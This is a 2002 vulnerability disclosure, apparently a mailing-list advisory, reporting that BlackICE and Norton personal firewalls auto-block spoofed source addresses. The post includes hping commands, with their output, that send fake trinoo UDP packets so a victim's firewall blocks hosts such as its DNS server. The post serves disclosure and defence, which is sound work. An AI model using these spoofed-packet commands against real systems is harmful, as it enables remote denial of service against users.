Multiple Vendor PC firewall remote denial of services Vulnerability

["Yiming Gong" <yiming () security zz ha cn>]

Overview
In a default installation, some personal firewall software will work
with auto-block function on, and this time if you fake a high level
dangerous attack packet with spoof address target these pc, these
firewall will immediately block the spoofed ip address without any
further judgement. Thus, an intruders might quickly block quite a great
internet address for a victim pc remotely.

Example
I’ve test this on BlackICE and Norton personal firewall

Below are the steps and result of the test on BlackICE,

step 1:A clean and DEFAULT installation of  blackice defender for
server(version 2.9.cap) on a win2k server  
pc,which ip address is ip.add.of.victim

step 2:On a linux box with hping (a free soft can get from
www.hping.org) installed,perform the following three  
commands:
---
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.
of.dnsserver
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a
www.google.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a
www.networkice.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers
+ 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
---
These three commands all do the same thing:send fake trinoo
communication udp packet to our target machine  
ip.add.of.victim with spoofed ip adress. ( google,networkeice,and
ip.add.of.dnsserver-our dns server)

result:Each time the command executed,the blackice icon on the windows
system tray flash,and an entries added   
in blackice 's Advanced Frirewall Settings automatically whick block all
the packet of the spoofed  
address.And the spoofed ip address is unreachable immediately.

The test steps and result of Norton personal firewall are almost the
same, using  hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc
-c 2 -a ip.of.spoofed.address instead.

Vendor Response
I’ve contacted symsecurity () symantec com and NSupport () iss net on Sep 24,
2002, Symantec told me they have forwarded my concerns on to the
appropriate team, and BlackIce reply me As the product exists now, there
is nothing that can be done to correct this.  And they are in the hopes
that something can be done in a future release.

Affected Versions:
--
I have test the following product

BlackICE Defender for server version 2.9.cap
BlackICE Server Protection version 3.5.cdf
Norton personal firewall 2002 (version 4.0)
All are vulnerable.



 
 
-- 
我要更好的生活 



Yiming Gong 
Senior System Administrator 
China Netcom
yiming () security zz ha cn 
http://security.zz.ha.cn 
0086-371-7934907